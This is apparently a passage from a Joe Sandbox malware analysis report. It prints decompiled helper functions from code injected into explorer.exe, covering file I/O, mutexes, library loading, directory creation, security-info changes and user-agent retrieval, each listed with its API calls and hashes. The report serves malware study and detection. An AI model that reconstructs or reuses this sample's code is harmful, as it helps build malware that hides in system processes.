					if(_t58 == 0) {
						L9:
						_t29 =  *0x9e684; // 0xe7f8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E0008861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t34 = E00088604(_t4); // executed
					_t60 = _t34;
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}














                  0x0008a6ac
                  0x0008a6ad
                  0x0008a6ae
                  0x0008a6b2
                  0x0008a6b4
                  0x0008a6b9
                  0x0008a6c9
                  0x0008a6cd
                  0x0008a757
                  0x0008a757
                  0x0008a759
                  0x0008a75b
                  0x0008a75d
                  0x0008a75d
                  0x0008a6d3
                  0x0008a6e1
                  0x0008a6e5
                  0x0008a73d
                  0x0008a73d
                  0x0008a743
                  0x0008a748
                  0x0008a750
                  0x0008a756
                  0x00000000
                  0x0008a748
                  0x0008a6e7
                  0x0008a6eb
                  0x0008a6f0
                  0x0008a6f2
                  0x0008a6f8
                  0x00000000
                  0x00000000
                  0x0008a6fc
                  0x0008a6ff
                  0x0008a700
                  0x0008a706
                  0x0008a707
                  0x0008a708
                  0x0008a72d
                  0x0008a70f
                  0x0008a761
                  0x00000000
                  0x00000000
                  0x0008a763
                  0x0008a766
                  0x0008a76c
                  0x0008a76e
                  0x0008a76e
                  0x0008a776
                  0x0008a779
                  0x00000000
                  0x0008a779
                  0x0008a717
                  0x0008a71a
                  0x0008a71e
                  0x0008a720
                  0x0008a723
                  0x0008a728
                  0x0008a72c
                  0x0008a72c
                  0x00000000
                  0x0008a72d
                  0x0008a6bb
                  0x00000000

                  APIs
                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
                  • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,00E7FD30,00000400), ref: 0008A776
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseFileHandleRead
                  • String ID:
                  • API String ID: 2331702139-0
                  • Opcode ID: c553b62fb3b61c4507a951b772411a711dc832c41c1f77446b10b71353d2c502
                  • Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
                  • Opcode Fuzzy Hash: c553b62fb3b61c4507a951b772411a711dc832c41c1f77446b10b71353d2c502
                  • Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008153B, Relevance: 3.1, APIs: 2, Instructions: 69synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 76%
                  			E0008153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0x9e6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0x9e6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E00081080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0x9e6e8 = E000891A6(_t3, 0);
							E000885C2( &_v8);
							_t7 = E00088604(0x100);
							 *0x9e6f0 = _t7;
							if(_t7 != 0) {
								 *0x9e6fc = 0;
								_t9 = E00088604(0x401);
								 *0x9e6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0x9e6c0; // 0x0
									if(__eflags == 0) {
										E000915B6(0x88202, 0x8820b);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E0008E1BC(0x9bd28, _t24); // executed
									 *0x9e6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}










                  0x0008153e
                  0x00081545
                  0x0008154b
                  0x00081552
                  0x00081607
                  0x00081607
                  0x00081607
                  0x00081558
                  0x0008155b
                  0x00081561
                  0x00081568
                  0x00000000
                  0x0008156e
                  0x00081573
                  0x00081578
                  0x0008157d
                  0x00000000
                  0x00081583
                  0x0008158f
                  0x00081594
                  0x0008159e
                  0x000815a3
                  0x000815ab
                  0x000815b9
                  0x000815bf
                  0x000815c4
                  0x000815ca
                  0x000815cc
                  0x000815d2
                  0x000815d8
                  0x000815e4
                  0x000815ea
                  0x000815eb
                  0x000815f2
                  0x000815f8
                  0x000815fd
                  0x00081602
                  0x000815ce
                  0x000815ce
                  0x00000000
                  0x000815ce
                  0x000815ad
                  0x000815ad
                  0x000815af
                  0x000815af
                  0x000815af
                  0x000815ab
                  0x0008157d
                  0x00081568
                  0x0008160c

                  APIs
                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateMutex$AllocateHeap
                  • String ID:
                  • API String ID: 704353917-0
                  • Opcode ID: 7c5440741e29b163d5f23002852b46c6bf079362bade3a3716c064fcde357f5f
                  • Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
                  • Opcode Fuzzy Hash: 7c5440741e29b163d5f23002852b46c6bf079362bade3a3716c064fcde357f5f
                  • Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008E1BC, Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 47%
                  			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000895C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0008E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000885C2( &_v8);
				return _t25;
			}










                  0x0008e1bf
                  0x0008e1c2
                  0x0008e1c8
                  0x0008e1ca
                  0x0008e1cf
                  0x0008e1d1
                  0x0008e1db
                  0x0008e1dc
                  0x0008e1eb
                  0x0008e1de
                  0x0008e1de
                  0x0008e1de
                  0x0008e1ef
                  0x0008e1f6
                  0x0008e1fc
                  0x0008e1fc
                  0x0008e201
                  0x0008e20c

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
                  • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 4133054770-0
                  • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                  • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
                  • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                  • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00082C8F, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                  Download Yara Rule
                  C-Code - Quality: 65%
                  			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E0008B700(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E0008BB8D(_t70) == 0) {
					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E00082C64( &_v1084, __eflags);
					} else {
						E0008B012(_t54,  &_v564); // executed
						_t32 = E0008109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000892E5( &_v1084);
						E000885D5( &_v12);
					}
				} else {
					_t38 = E0008109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0x9e684; // 0xe7f8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E0008109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000892E5( &_v564);
						E000885D5( &_v8);
					} else {
						_t71 = E00082C64( &_v44, _t78);
					}
					E000885D5( &_v12);
				}
				_v8 = _t71;
				_t25 = E0008B269(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E0008B269(_t71) == 0) {
						E0008861A( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}























                  0x00082c9e
                  0x00082ca0
                  0x00082ca3
                  0x00082ca9
                  0x00082cb2
                  0x00082d36
                  0x00082d3b
                  0x00082d3c
                  0x00082d3e
                  0x00082d8f
                  0x00082d40
                  0x00082d46
                  0x00082d50
                  0x00082d55
                  0x00082d5a
                  0x00082d5d
                  0x00082d5e
                  0x00082d63
                  0x00082d64
                  0x00082d65
                  0x00082d6c
                  0x00082d6d
                  0x00082d7a
                  0x00082d80
                  0x00082d85
                  0x00082cb4
                  0x00082cb9
                  0x00082cbe
                  0x00082ccc
                  0x00082cd0
                  0x00082cd5
                  0x00082cdb
                  0x00082cdd
                  0x00082ced
                  0x00082cf2
                  0x00082cf7
                  0x00082cfa
                  0x00082cfb
                  0x00082d00
                  0x00082d01
                  0x00082d02
                  0x00082d0f
                  0x00082d15
                  0x00082cdf
                  0x00082ce4
                  0x00082ce4
                  0x00082d21
                  0x00082d26
                  0x00082d93
                  0x00082d96
                  0x00082d9d
                  0x00082da1
                  0x00082da9
                  0x00082dbc
                  0x00082dc1
                  0x00082dc5
                  0x00082da9
                  0x00082dca

                  APIs
                  • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateDirectory
                  • String ID:
                  • API String ID: 4241100979-0
                  • Opcode ID: 2a7b173c4ae1e61358d7ec6959bf71d08d6f29f55be685fc2dd38ddca234be52
                  • Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
                  • Opcode Fuzzy Hash: 2a7b173c4ae1e61358d7ec6959bf71d08d6f29f55be685fc2dd38ddca234be52
                  • Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085AFF, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00085AFF(intOrPtr __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t22;
				intOrPtr _t23;
				signed int _t30;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed int _t47;
				void* _t55;

				_t55 = __fp0;
				_t45 = __edx;
				_t47 = 0;
				_t22 = E00088604(0x14);
				_t38 =  *0x9e688; // 0xb0000
				_t46 = _t22;
				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t38 + 0x228));
					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t46 = 2;
				 *(_t46 + 4) = _t47;
				_t23 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
				if(_t40 == 0) {
					L9:
					if(E00082DCB() == 0) {
						goto L11;
					} else {
						_t47 = _t47 | 0xffffffff;
					}
				} else {
					_t45 =  *_t40;
					_t30 = _t47;
					if(_t45 == 0) {
						goto L9;
					} else {
						_t44 =  *((intOrPtr*)(_t40 + 4));
						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
							_t30 = _t30 + 1;
							if(_t30 < _t45) {
								continue;
							} else {
								goto L9;
							}
							goto L12;
						}
						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
							L11:
							E00084D6D(_t46, _t45, _t55);
						} else {
							goto L9;
						}
					}
				}
				L12:
				E0008A39E();
				E0008A39E();
				return _t47;
			}

















                  0x00085aff
                  0x00085aff
                  0x00085b0a
                  0x00085b0c
                  0x00085b12
                  0x00085b18
                  0x00085b22
                  0x00085b2b
                  0x00085b36
                  0x00085b41
                  0x00085b47
                  0x00085b4f
                  0x00085b4f
                  0x00085b55
                  0x00085b5b
                  0x00085b5e
                  0x00085b69
                  0x00085b71
                  0x00085b73
                  0x00085b78
                  0x00085b98
                  0x00085b9f
                  0x00000000
                  0x00085ba1
                  0x00085ba1
                  0x00085ba1
                  0x00085b7a
                  0x00085b7a
                  0x00085b7c
                  0x00085b80
                  0x00000000
                  0x00085b82
                  0x00085b82
                  0x00085b85
                  0x00085b8b
                  0x00085b8e
                  0x00000000
                  0x00085b90
                  0x00000000
                  0x00085b90
                  0x00000000
                  0x00085b8e
                  0x00085b96
                  0x00085ba6
                  0x00085ba8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00085b96
                  0x00085b80
                  0x00085bad
                  0x00085bb0
                  0x00085bb8
                  0x00085bc3

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetDriveTypeW.KERNELBASE(?), ref: 00085B4F
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateDriveHeapType
                  • String ID:
                  • API String ID: 414167704-0
                  • Opcode ID: cb03de1a2ba3e6c236d1db646638ddc4e840487864a8cce90740a25b4b3f0c80
                  • Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
                  • Opcode Fuzzy Hash: cb03de1a2ba3e6c236d1db646638ddc4e840487864a8cce90740a25b4b3f0c80
                  • Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008BC7A, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                  Download Yara Rule
                  C-Code - Quality: 44%
                  			E0008BC7A(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0x9e674; // 0x210
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000895E1(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
				_push(1);
				_push(_t18);
				_t19 =  *0x9e68c; // 0xe7fab8
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0x9e68c; // 0xe7fab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0x9e68c; // 0xe7fab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0x9e68c; // 0xe7fab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000885D5( &_v24);
				return _t39;
			}















                  0x0008bc81
                  0x0008bc84
                  0x0008bc8f
                  0x0008bc92
                  0x0008bc95
                  0x0008bc98
                  0x0008bc9b
                  0x0008bca1
                  0x0008bca5
                  0x0008bca8
                  0x0008bca9
                  0x0008bcab
                  0x0008bcac
                  0x0008bcb9
                  0x0008bcbe
                  0x0008bcc2
                  0x0008bcc6
                  0x0008bcc7
                  0x0008bccc
                  0x0008bcd7
                  0x0008bcd9
                  0x0008bcdc
                  0x0008bce1
                  0x0008bce2
                  0x0008bce3
                  0x0008bce4
                  0x0008bce6
                  0x0008bce8
                  0x0008bcf1
                  0x0008bcf3
                  0x0008bcf3
                  0x0008bcf1
                  0x0008bcf4
                  0x0008bcfd
                  0x0008bcfd
                  0x0008bd04
                  0x0008bd0f

                  APIs
                  • SetSecurityInfo.ADVAPI32(00000210,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: InfoSecurity
                  • String ID:
                  • API String ID: 3528565900-0
                  • Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                  • Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
                  • Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                  • Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008E450, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E0008E450(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0x9e6b0; // 0x27907e8
				if( *_t5 == 0) {
					_v8 = E000895C7(0x2a7);
					 *0x9e788 = E000891A6(_t6, 0);
					E000885C2( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E00088604(0x101);
					 *0x9e788 = _t10;
					_t11 =  *0x9e6b0; // 0x27907e8
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
					}
				}
			}








                  0x0008e453
                  0x0008e454
                  0x0008e45c
                  0x0008e4a6
                  0x0008e4b3
                  0x0008e4b8
                  0x00000000
                  0x0008e45e
                  0x0008e463
                  0x0008e46a
                  0x0008e473
                  0x0008e47a
                  0x0008e481
                  0x0008e485
                  0x0008e4bd
                  0x0008e4c0
                  0x0008e487
                  0x0008e499
                  0x0008e499
                  0x0008e485

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Heap$AgentAllocateFreeObtainStringUser
                  • String ID:
                  • API String ID: 471734292-0
                  • Opcode ID: 29236988d82dfaf5d7fccad8192a8dcf0ee0c80ce76389ae182468f900f99f52
                  • Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
                  • Opcode Fuzzy Hash: 29236988d82dfaf5d7fccad8192a8dcf0ee0c80ce76389ae182468f900f99f52
                  • Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A65C, Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}









                  0x0008a65c
                  0x0008a65f
                  0x0008a660
                  0x0008a663
                  0x0008a665
                  0x0008a668
                  0x0008a66d
                  0x0008a69e
                  0x0008a6a0
                  0x0008a66f
                  0x0008a66f
                  0x0008a66f
                  0x0008a691
                  0x00000000
                  0x00000000
                  0x0008a693
                  0x0008a696
                  0x0008a69c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008a69c
                  0x0008a6a5
                  0x0008a6a5
                  0x0008a6a1
                  0x0008a6a4

                  APIs
                  • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                  • Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
                  • Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                  • Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A5F7, Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008A5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x9e684; // 0xe7f8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}






                  0x0008a601
                  0x0008a615
                  0x0008a61a
                  0x0008a623
                  0x0008a625
                  0x0008a62f
                  0x0008a62f
                  0x00000000
                  0x0008a635
                  0x00000000

                  APIs
                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                  • Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
                  • Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                  • Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A63B, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0008A63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}




                  0x0008a64f
                  0x0008a652
                  0x0008a657
                  0x0008a65b

                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                  • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
                  • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                  • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00088604, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00088604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
				return _t2;
			}




                  0x00088612
                  0x00088619

                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                  • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
